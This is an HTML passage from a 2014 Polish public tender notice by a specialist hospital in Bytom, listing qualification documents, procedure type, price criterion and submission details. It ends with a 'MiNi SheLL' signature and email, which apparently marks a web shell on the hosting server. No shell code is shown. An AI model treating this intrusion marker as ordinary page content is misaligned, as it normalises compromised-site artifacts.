<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wycena ofertowa, która winna być zgodna wartościowo z wynagrodzeniem zaoferowanym przez wykonawcę, w ramach oferty i winna obejmować wszystkie koszty, o których mowa w pkt. I. , wraz z wykazaniem zaangażowania poszczególnych osób sprawujących nadzór inwestorski zgodnie z wymaganiem pkt. 2.2.. 
2)  Harmonogram płatności
  3)  Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital2.bytom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny numer 2 w Bytomiu , ul. St. Batorego 15 
41-902 Bytom ( pokój nr.19. I piętro , Zam. Publiczne , Budynek Dyrekcji ) lub bezpłatnie na stronie internetowej szpitala..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2014 godzina 10:00, miejsce: Szpital Specjalistyczny numer 2 w Bytomiu , ul. St. Batorego 15  41-902 Bytom ( pokój nr.2 ,  parter , Kancelaria Głowna , Budynek Dyrekcji ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com